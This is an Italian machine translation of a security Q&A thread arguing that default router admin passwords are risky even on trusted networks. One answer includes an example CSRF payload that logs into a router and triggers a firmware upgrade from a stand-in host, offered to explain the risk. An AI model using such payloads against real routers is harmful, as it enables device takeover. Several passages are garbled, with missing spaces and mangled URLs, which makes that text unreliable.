È pericoloso utilizzare le password di amministratore del router predefinite se nella rete sono consentiti solo utenti fidati?

Is it dangerous to use default router admin passwords if only trusted users are allowed on the network?

Sì,èpericoloso.Quicisonoalcunimodi"tecnici" per farlo (oltre a dire che è male):

1. Nessuna protezione CSRF

Potresti visitare felicemente un sito web e potrebbero esserci diversi problemi:

1. Il sito Web stesso è stato alterato e contiene contenuti dannosi, oppure
2. Tutti gli elementi della pagina sono stati MITM nel mezzo attaccato (stai zitto, sto cercando di essere divertente) e ho avuto elementi intercettati con The Thing (tm), e;

3. L'attacco CSRF è stato inserito da stile, img, link o qualsiasi altra cosa:

   Esempio approssimativo:

   <img src="http://admin:[email protected]/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/>

Inmolticasi,laprotezioneCSRFnonèdiaiutoseriesciadaccedereconadmin:[email protected]àunanuovasessioneeuntokenperteinvecediusarequelloattuale.

Congratulazioniperl'ultimainstallazionediRouterBackdoor(tm)conaccessocompletoallashell.

2.LaprotezioneCSRFesiste,manonlaprotezioneXSScorretta

Eseguiilcontestodiescapeeinseriscihax.js,osoloilcodiceJSchepotrebbeeseguireleseguentifunzioni:

1. RubatokenCSRFconjavascript
2. Visualizza<imgsrc=""/> sopra.

Inoltre, le immagini di .svg possono bypassare molta protezione XSS.

3. La pagina di configurazione del router è accessibile tramite la rete wireless?

Qualcuno accede alla tua rete wireless, visita la pagina di configurazione del router e apporta le modifiche necessarie / aggiorna il firmware / reindirizza il DNS / qualsiasi cosa desideri. Come il primo, ma con un'interfaccia point-and-click.

4. Altri modi

• Dipendenti scontenti
• Se qualcuno trova la sua strada sulla tua rete attraverso un'altra macchina compromessa, può usare quella macchina per compromettere il tuo router e poi sei disossato.

Ricorda che gli attacchi XSS / CSRF potrebbero esistere, o addirittura essere aggiunti durante gli aggiornamenti, se il venditore fa schifo.

Quindi non farlo. Per favore. Il mio cuore non può sopportarlo. : (

Come hai notato correttamente, gli attacchi CSRF sono una possibilità. La prevenzione degli attacchi CSRF è possibile con un token CSRF, ma questo non è nulla che tu possa fare come utente del router. Quindi, se sei un venditore di router, devi assolutamente implementare la protezione CSRF, ma come utente devi convivere con ciò che ti offre il venditore e molti fornitori non hanno una protezione CSRF adeguata.

Oltre a CSRF ci sono altri attacchi che possono essere usati contro il router. Similmente a CSRF, molti di questi usano il browser come trampolino, cioè richiedono solo una visita ad un sito Web che ha degli exploit incorporati (come incorporato nella pubblicità) e non hanno bisogno di compromettere il computer dell'utente. Notevoli tra questi sono gli attacchi cross site scripting (XSS) e DNS rebinding. Anche in questo caso il fornitore potrebbe implementare una protezione adeguata in teoria, ma in pratica spesso non viene fatto.

E poi anche gli utenti fidati potrebbero avere il loro sistema compromesso in vari modi. In questo caso l'attaccante si trova all'interno della rete fidata e la conoscenza delle password predefinite rende molto più semplice il dirottamento del router e rende il controllo dell'attaccante sulla rete più permanente e meno ovvio in questo modo.

Questo significa che anche se pensi di avere una protezione adeguata, dovresti cambiare la password dall'impostazione predefinita con lo spirito di difesa in profondità. Più sconosciute un attaccante deve scoprire di infiltrarsi nella rete, più difficile è farlo per lui, e migliore è la sicurezza della rete. Ovviamente, ciò vale non solo per la password ma anche per la sicurezza generale del router, ad esempio alcuni router hanno bug o persino backdoor in cui non è nemmeno necessario conoscere la password dell'utente per un'acquisizione. E non sono solo i router, ma devi anche stare attento ad altri dispositivi come stampanti, scanner, lampadine intelligenti, TV ecc.

Sì, i router sono stati compromessi da malware in esecuzione all'interno della rete , testando un elenco di password predefinite. Il malware entra nella rete attraverso un allegato di phishing infetto o un exploit del browser.

Se hai la possibilità di convalidare il router non può essere riconfigurato al di fuori della rete locale, non hai solo la possibilità di cambiare la password predefinita, hai il dovere di risolverlo.

Trovo straordinario che questa domanda sia stata posta e io non sono nemmeno un professionista della sicurezza. È un po 'come chiedere "Va bene lasciare il caveau della banca sbloccato se solo i cassieri fidati sono ammessi nel seminterrato?". Non si sa da dove cominciare a rispondere. Mi chiedo se la domanda fosse un modello di Ali G, pubblicato per lo sport.

Una password predefinita - per niente - è poco meglio di un sistema che non usa una password. In un certo senso, in realtà è peggio, perché favorisce l'illusione della protezione tramite password (che potrebbe essere un presupposto fondamentale su cui altre parti della sicurezza del sistema fanno affidamento, in un sistema di controlli e contrappesi e controlli compensativi) mentre in realtà la persona con intento di malizia è ora dentro. Diventa una specie di porta sul retro per quelli là fuori nel sapere. I tester di penna fanno regolarmente dimostrazioni alle fiere IT di quanto sia facile cercare le password predefinite nelle schede tecniche dei fornitori e sul web.

I problemi delle password di default peggioreranno molto quando l'Internet of Things, l'ultimo esempio di fornitura senza domanda, andrà avanti. Sto ancora provando dal vedere una mappa di visualizzazione proiettata di tutti i bollitori internet hackerabili (sì, davvero) a Londra che stavano rivelando l'IP del computer del loro proprietario e l'apprendimento delle bambole dotate di telecamere che sono state trasformate in spie remote dai loro utenti e riprogrammate in imprecazioni giurate.

SÌ!

Non utilizzare il nome utente o le password predefiniti

Ecco il motivo per cui:

1. I router sono famigerati per essere vulnerabili alle backdoor. [cioè, anche se tu hai configurato le interfacce amministrative per essere accessibili solo attraverso la rete locale, non è improbabile che abbia una subdola porta backdoor che è esposta a Internet.
2. Le console Web del router sono famigerate per essere vulnerabili a CSRF, XSS e a molte altre vulnerabilità. Concatenando i due precedenti, un utente malintenzionato può fare in modo che gli utenti ignari effettuino il login con la password del nome utente predefinito e invino anche richieste valide per modificare le configurazioni. Interessante, tutte queste azioni potrebbero essere eseguite in background, mentre l'utente sta giocando a un gioco web;)
3. La sicurezza WiFi non dipende interamente dall'entropia della password. Dipende dall'algoritmo usato pure.
4. Le vulnerabilità Zero Day esistono e tutti gli utenti fidati possono esserne avictim. Se i loro account sono compromessi, saresti nei guai.
5. Ultimo ma non meno importante;

CSRF is a possibility, but that can be defended against with CSRF token.

Tadaa .. nessuno dei router ha ancora risolto per le loro interfacce. Nel 23 ° secolo, probabilmente lo faranno.

Anche un utente fidato può avere hackerato la sua macchina. Usando questo come punto di partenza, un utente malintenzionato può ottenere pieno accesso ai tuoi router. In altre parole, si avrebbe una protezione ridotta in caso di un attacco dall'interno. Questo è un classico esempio di essere accecati - un cavallo di Troia.

Questo può sembrare snarky, ma se sei abbastanza pigro da non cambiare la password predefinita perché il dispositivo si trova in una rete isolata, cosa dire che qualcuno non era altrettanto pigro nell'impostare questa rete protetta. Inoltre, il tuo accesso tramite wifi vanifica l'idea che questa rete sia sufficientemente sicura. L'unico modo per isolare fisicamente un dispositivo di rete in modo tale che la password predefinita sarebbe sicura, sarebbe di non avere nulla collegato (alimentazione inclusa), inserirlo in cemento e quindi rilasciarlo nella fossa delle Marianne. Allora dovresti ancora preoccuparti che James Cameron possa accedervi.

Se qualsiasi dispositivo che stai utilizzando per un AP wireless finisce per essere compromesso ... se questa rete contiene informazioni riservate, finirai per avere un brutto momento.

È altamente improbabile che qualcuno stia per sfruttare una vulnerabilità sul tuo router wireless? Sì.

È una possibilità? Sì.

Se sei anche solo lontanamente serio sulla sicurezza della rete dovresti SEMPRE cambiare la password predefinita sul tuo router!

Oltre a dispositivi di sicurezza aziendali decenti (per esempio quelli che eseguono scansioni di rete, IDS, file di host personalizzati - tutto ciò che è divertente) non c'è ancora nulla che impedisca al malware di entrare nella tua rete e sfrutta il fatto che le tue password sono impostate su qualcosa di default.

Alla fine della giornata, i tuoi utenti finali faranno infettare la tua rete.

Non è un forse, è solo una questione di tempo.

Dire "Jan in accounting" ha 86 anni e conosce Jack su Infosec.

È più pericolosa di TUTTE le altre minacce che puoi affrontare giorno per giorno.

Modifica la password. Cambia il nome utente predefinito.

È possibile implementare tutti i tipi di misure protettive ed essere comunque compromessi a causa di un nome utente e una password predefiniti. Dipendente scontento, qualcuno intelligente e ancora in grado di apprendere script kiddie (durante il giorno in cui porta il tuo bambino al lavoro), possono accadere cose di ogni genere.

Perché crescere in un'azienda?

E quando cambi questa password per amore di dio non rendi la cosa stupida. Ho visto l'installazione di reti (condivisioni aperte con tutti i permessi ... tutto ciò che urla cosa e dove è ... che ha informazioni oltraggiosamente sensibili su di loro) e la password .... a un router rivolto verso l'esterno è qualcosa di simile a '1234 # businessname' .... Mi sento un po 'obbligato a contattare i loro clienti e far sapere loro che hanno assunto una società di gestione IT che non prende sul serio la sicurezza.

Poi di nuovo ho cose migliori da fare.

Ogni volta che vengono colpiti con cryptolocker finiscono per affrontare le conseguenze.

Perdere un cliente da $ 50k / anno può davvero danneggiare una piccola azienda.

Sono turbato dal pensiero che sta dietro "I miei pensieri sono che se un attaccante non può entrare nella rete, non può compromettere il router ...". Ciò sembra tradire una totale mancanza di apprezzamento del principio di segregazione in buona sicurezza.

Si controlla un rischio con misure pertinenti direttamente applicabili al luogo in cui si presenta, piuttosto che caricare tutto il proprio affidamento sugli effetti indiretti di controlli globali o posizionati in remoto altrove.

Si prevede che le navi non lascino entrare acqua (buona sicurezza perimetrale) ma il diligente costruttore navale si adatta ancora alle paratie sottocoperta, in modo che qualsiasi penetrazione di acqua che si verifichi in violazione di tutte le migliori progettazioni altrove sia ancora contenuta in una piccola area (limitazione del danno per compartimentazione). Il fatidico Herald of Free Enterprise ha tagliato i costi non preoccupandosi di adattarsi alle paratie. Il 6 marzo 1987, per errore dell'operatore, fece entrare acqua attraverso le porte a prua aperte. E 'elencato violentemente e ha impiegato solo 90 secondi per capovolgersi mentre appena fuori dal porto. 193 persone sono morte nell'acqua quasi gelata.

Potresti aver sentito parlare di "Prevenire è meglio della cura" .
Non essere così pigro, che non vuoi neanche cambiare la password predefinita per i tuoi router. Questo è roba base di classe 101. Modifica sempre la password predefinita . Non importa quanto siano sicure le condizioni oggi. Cambiano col tempo. Non sai mai quale tipo di attacco verrà inventato in futuro. Tieniti aggiornato per tutto.

Come regola generale, non fare mai affidamento su un singolo punto di errore. Tutti qui hanno punti validi. Se qualcuno vuole davvero sulla tua rete, è davvero solo una questione di tempo prima che abbiano accesso. Che si tratti di un attacco di forza bruta, di un attacco DDOS o di una semplice ingegneria sociale che induca uno degli utenti autenticati a divulgare le proprie credenziali, alla fine, un singolo punto di errore avrà esito negativo. Proteggi tutto ciò che è importante sulla tua rete proprio come è stato esposto a Internet direttamente. Inoltre, tieni presente che se memorizzi informazioni sensibili sui clienti, sei responsabile e responsabile in tribunale in caso di perdita.

In linea di principio, questo non richiede nemmeno tempo per l'implementazione. Se il tuo modello di router viene impostato con una password apparentemente non casuale, il produttore non sta nemmeno cercando di guardare sicuro; dovrebbero essere considerati inaffidabili. I produttori che cercano di vendere router economici sono notoriamente non vale la pena dare il beneficio del dubbio . Ora hai un router non affidabile. Come dici tu, questo sarebbe un grave fattore di rischio.

I router designati come aventi solo utenti fidati (anche escludendo le porte esterne) non sono comuni.

Gli smartphone ospitano smartphone con scarsa sicurezza (aggiornamenti), come un esempio.

I sistemi aziendali ospitano utenti che in genere non dovrebbero modificare le impostazioni dell'infrastruttura.

Le reti configurate come esercizio chiaramente non dovrebbero usare impostazioni non sicure solo perché puoi farla franca; l'esercizio è sconfitto. (Eccezione: l'esercizio è specificamente per dimostrare impostazioni predefinite non sicure).

Le reti per i test meritano ancora una certa dose di attenzione. In alcuni casi ti aspetteresti che corrispondano alla tua descrizione. Tuttavia, nel determinare questo, staresti facendo un punto di omissione della sicurezza standard. Di nuovo, in linea di principio, non hai motivo di sabotare il sistema in questo modo.

Diceware è un po 'fastidioso, ma riduce il problema alla generazione di numeri casuali decenti. Google un sito Web per generare una pagina di rotoli di dadi casuali e prendere i rotoli in modo casuale. Incolla la password sul router e così via.

Mi chiedo se ci sia qualche pensiero implicito dietro la Q originale che dice: "Un rischio: quindi un controllo per ordinarlo". Mentre in realtà la relazione tra rischi e controlli è molti, molti non uno.

Potresti avere un allarme per auto. Questo controllo risolve il rischio di furto di oggetti portatili dall'auto, e affronta anche il rischio separato dell'auto che viene presa e portata via. (i): un controllo; più di un rischio correlato.

Hai anche una portiera per auto bloccabile. Questo è un controllo diverso, ma affronta i due rischi precedenti.

Ogni rischio è indirizzato da più di un controllo (allarme e serratura della porta).
Quindi (ii): un rischio (prendendo ciascuno a sua volta); più di un controllo correlato.

Non cesserai di preoccuparti di bloccare la portiera della tua macchina solo perché hai un allarme per la macchina. E contro il furto d'auto potresti avere anche un apparato Krooklok o una barra del volante, o una password o un segnale acustico di accensione, o un rilevamento GPS a distanza (tre, quattro o persino cinque controlli contro un rischio). Contro tentativi successivi di vendere o clonare il veicolo, hai il numero di telaio inciso sul parabrezza più almeno un posto segreto (fino a sei controlli contro il furto d'auto o le sue conseguenze dirette).

Nessuno di questi controlli è superfluo solo perché altri sono a posto, anche se penso che la maggior parte di noi considererebbe tutti e sei eccessivi e non si preoccuperebbe del disagio di un allarme capriccioso o di un ingombrante dispositivo fisico che deve essere sbloccato se meno onerosa è anche una buona sicurezza.

In sintesi, la relazione tra i rischi e i controlli che li trattano non è uno a uno, e questo vale per reti e router come qualsiasi altra cosa.